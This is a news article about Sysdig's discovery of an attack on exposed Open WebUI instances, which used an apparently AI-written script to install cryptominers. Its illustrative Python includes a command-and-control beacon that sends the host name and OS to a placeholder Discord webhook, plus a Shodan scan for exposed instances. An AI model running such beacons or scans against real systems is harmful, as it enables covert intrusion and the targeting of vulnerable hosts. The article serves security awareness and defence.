Sysdig Reveals Discovery of Cyberattack Aimed at Tool to Build AI Apps
Sysdig today disclosed an example of how a tool used to build artificial intelligence (AI) applications was compromised by a cyberattack that led to the injection of malicious code and the downloading of cryptominers.
The Sysdig Threat Research Team (TRT) discovered an attack aimed at a misconfigured instance of Open WebUI, a tool widely used by data scientists to upload Python scripts to large language models (LLMs). The exposed instance not only lacked any authentication requirement but also provided access to a full set of administrative privileges.
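Exposures of this kind are often easy to verify from the outside. Below is a minimal sketch, not Sysdig's methodology, of how a team might check whether its own Open WebUI deployment answers API calls without credentials; the /api/models path is an assumption based on Open WebUI's commonly documented API and may differ across versions.

```python
# Minimal sketch: check whether an Open WebUI instance answers API
# requests without credentials. The /api/models path is assumed from
# Open WebUI's commonly documented API and may vary by version.
import sys

import requests  # pip install requests


def check_open_webui_auth(base_url: str) -> None:
    """Request the model list with no token; an HTTP 200 suggests
    the instance is serving API responses unauthenticated."""
    resp = requests.get(f"{base_url.rstrip('/')}/api/models", timeout=10)
    if resp.status_code == 200:
        print(f"WARNING: {base_url} responded without authentication")
    elif resp.status_code in (401, 403):
        print(f"OK: {base_url} requires authentication")
    else:
        print(f"Inconclusive: HTTP {resp.status_code} from {base_url}")


if __name__ == "__main__":
    # Only probe infrastructure you own or are authorized to test.
    check_open_webui_auth(sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000")
```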
More interesting still, the malicious Python script uploaded to the tool appears to have been developed using some type of AI coding tool.
Michael Clark, director of threat research for Sysdig, said that after reviewing the code, it became apparent it was constructed in a way no human would have written it, though there were clear signs it had been reviewed to some degree by a human.
The Sysdig report also notes that, for reasons unknown, the variant of the attack developed to exploit Open WebUI running on Windows is not only more sophisticated than the variant crafted for the tool running on Linux, but it is also almost undetectable.
Like most attacks involving malware, this one included a command-and-control (C2) capability. In this case, it was linked via a webhook interface to a Discord server.
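Part of the appeal of a Discord webhook as a C2 channel is how little it requires: once malware holds the webhook URL, a single HTTPS POST delivers a message into the attacker's channel, and the traffic blends in with ordinary calls to discord.com. The sketch below is purely illustrative, not the attacker's actual code, and the webhook URL is a hypothetical placeholder.

```python
# Illustrative only; not the attacker's code. Shows why a Discord
# webhook is attractive as a C2 channel: posting to it requires nothing
# beyond the webhook URL itself, and the traffic looks like ordinary
# HTTPS to discord.com.
import platform
import socket

import requests  # pip install requests

# Hypothetical placeholder; a real webhook URL embeds a channel ID and token.
WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>"


def beacon(message: str) -> None:
    """Post a message to the Discord channel behind the webhook."""
    requests.post(WEBHOOK_URL, json={"content": message}, timeout=10)


if __name__ == "__main__":
    beacon(f"host online: {socket.gethostname()} ({platform.system()})")
```

Because the channel rides over ordinary HTTPS to a popular service, it is hard to distinguish from legitimate traffic, which is one reason defenders increasingly treat outbound webhook calls from servers as a signal worth monitoring.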
It’s not clear how many misconfigured instances of Open WebUI there might be, but Sysdig notes that, using the Shodan search engine, it was able to discover 17,000 instances of the tool exposed to the Internet.
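That kind of census is easy to approximate with Shodan's official Python library. In the rough sketch below, the http.title query is an assumed fingerprint for Open WebUI's landing page, not Sysdig's actual search.

```python
# Rough sketch of an exposure census with the official Shodan library
# (pip install shodan). The http.title query is an assumed fingerprint
# for Open WebUI's landing page, not Sysdig's actual search.
import os

import shodan

api = shodan.Shodan(os.environ["SHODAN_API_KEY"])

# Count and sample Internet-facing hosts whose HTTP title suggests Open WebUI.
results = api.search('http.title:"Open WebUI"')
print(f"Exposed instances reported by Shodan: {results['total']}")
for match in results["matches"][:5]:
    print(f"{match['ip_str']}:{match['port']}")
```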
The challenge is that most of these tools were configured by data scientists who typically have limited cybersecurity expertise, so the probability that many of them are misconfigured is high. Additionally, it’s clear that cybercriminals have determined that AI applications are potentially among the richest targets available to them, which means they are now actively scanning for misconfigurations to exploit, noted Clark.
In this instance, the cybercriminals appeared more intent on illicit cryptomining using the infrastructure allocated to LLMs, but given the command-and-control software they installed, there was a clear intent to repeatedly access the underlying IT infrastructure. Additionally, cybercriminals, once they gain access to an IT environment, are well known for selling that access to other cybercriminals who may have more nefarious ambitions.
More troubling still, the Sysdig report makes it clear that cybercriminals are now using AI tools to craft attacks aimed at the software supply chain being used to build and deploy AI applications. The degree to which those software supply chains are secure will naturally vary from one organization to another, but if history is any guide, there will be many breaches involving AI tools and platforms ahead.
Ideally, cybersecurity teams should be proactively addressing those issues now rather than after a catastrophic event has occurred. Unfortunately, most teams building AI applications are far more focused on getting models to work; security is all too often a secondary concern.
Hopefully, the number of security incidents involving AI will be kept to a bare minimum once there is greater recognition of the potential threats. Of course, no one wants to be the first victim from whom everyone else learns what not to do, but at this point, it’s more a question of when, rather than if, there will be a major AI breach.